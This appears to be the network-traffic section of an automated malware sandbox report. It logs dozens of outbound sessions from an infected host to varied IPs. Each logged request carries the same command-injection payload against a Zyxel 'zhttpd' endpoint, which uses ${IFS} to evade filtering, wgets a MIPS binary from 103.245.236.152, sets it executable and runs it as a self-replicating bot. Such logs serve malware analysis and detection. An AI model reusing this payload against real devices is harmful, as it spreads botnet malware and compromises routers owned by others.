                                          Jan 14, 2024 15:46:36.462018013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9241192.168.2.2333692169.75.39.109443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.462083101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9242192.168.2.235946051.22.17.194443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.462131023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9243192.168.2.2337610221.80.161.244443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.462166071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9244192.168.2.2336740217.171.56.30443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.462227106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9245192.168.2.233414242.147.42.226443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.462255955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9246192.168.2.2336424155.114.43.19443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.462307930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9247192.168.2.2345386172.210.237.112443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.462330103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9248192.168.2.2339868194.52.94.189443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.462362051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9249192.168.2.2344250123.32.249.237443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.462378979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9250192.168.2.233783468.154.169.211443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.462414980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9251192.168.2.2347522117.77.174.188443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.462455034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9252192.168.2.2341872194.15.172.197443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.462497950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9253192.168.2.2344606151.86.142.64443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.462543011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9254192.168.2.234109095.175.197.78443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.462570906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9255192.168.2.235406262.184.50.232443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.462606907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9256192.168.2.233552071.72.255.252443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.462646961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9257192.168.2.2346594194.175.225.249443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.462666988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9258192.168.2.2347502171.170.212.129443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.462728977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9259192.168.2.2355774142.131.206.173443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.462762117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9260192.168.2.235213485.102.138.0443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.462812901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9261192.168.2.2338524100.229.239.227443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.462833881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9262192.168.2.2347386170.69.112.122443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.462878942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9263192.168.2.234222294.117.202.26443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.462918997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9264192.168.2.235903075.187.239.22443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.462960958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9265192.168.2.235115044.91.16.251443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.463006973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9266192.168.2.2333458143.167.204.41443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.463064909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9267192.168.2.2345848171.131.247.254443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.463102102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9268192.168.2.2355154196.93.28.155443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.463152885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9269192.168.2.2342800161.112.107.14443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.463170052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9270192.168.2.234199265.171.221.152443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.463186979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9271192.168.2.2334340139.160.131.190443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.463222027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9272192.168.2.2348824108.5.23.112443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.463296890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9273192.168.2.235104614.139.157.4443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.463345051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9274192.168.2.2351208126.106.39.178443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.463375092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9275192.168.2.234838417.82.209.18443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.463437080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9276192.168.2.23553042.148.92.249443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.463469028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9277192.168.2.2350040196.99.146.214443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.463499069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9278192.168.2.235483453.9.177.184443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.463562012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9279192.168.2.233760419.157.199.255443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.463602066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9280192.168.2.2347394203.198.193.244443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.463660002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9281192.168.2.234869671.193.17.10443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.463690996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9282192.168.2.234586662.68.114.65443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.463736057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9283192.168.2.234314224.54.84.208443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.463764906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9284192.168.2.2353726108.20.200.114443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.463800907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9285192.168.2.2345394221.27.109.9443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.463840008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9286192.168.2.235769271.241.164.221443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.463871956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9287192.168.2.235482645.9.7.4443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.463912964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9288192.168.2.234952498.62.246.13443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.463932991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9289192.168.2.2358012134.34.71.80443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.463965893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9290192.168.2.235545065.62.69.63443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.464030027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9291192.168.2.2344612206.200.152.64443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.464045048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9292192.168.2.2350238169.118.9.53443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.464099884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9293192.168.2.2358534205.59.209.4443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.464142084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9294192.168.2.2336466208.43.66.30443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.464169979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9295192.168.2.233375449.28.103.65443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.464221954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9296192.168.2.234656641.137.161.43443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.464246035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9297192.168.2.235706443.43.138.38443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.464308023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9298192.168.2.2338178189.133.218.142443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.464368105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9299192.168.2.2333244165.196.226.175443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.464401007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9300192.168.2.2343356143.36.73.233443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.464404106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9301192.168.2.2351950182.142.147.64443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.464441061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9302192.168.2.2353402212.109.61.117443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.464489937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9303192.168.2.2345392191.167.209.183443
                                          TimestampBytes transferredDirectionData
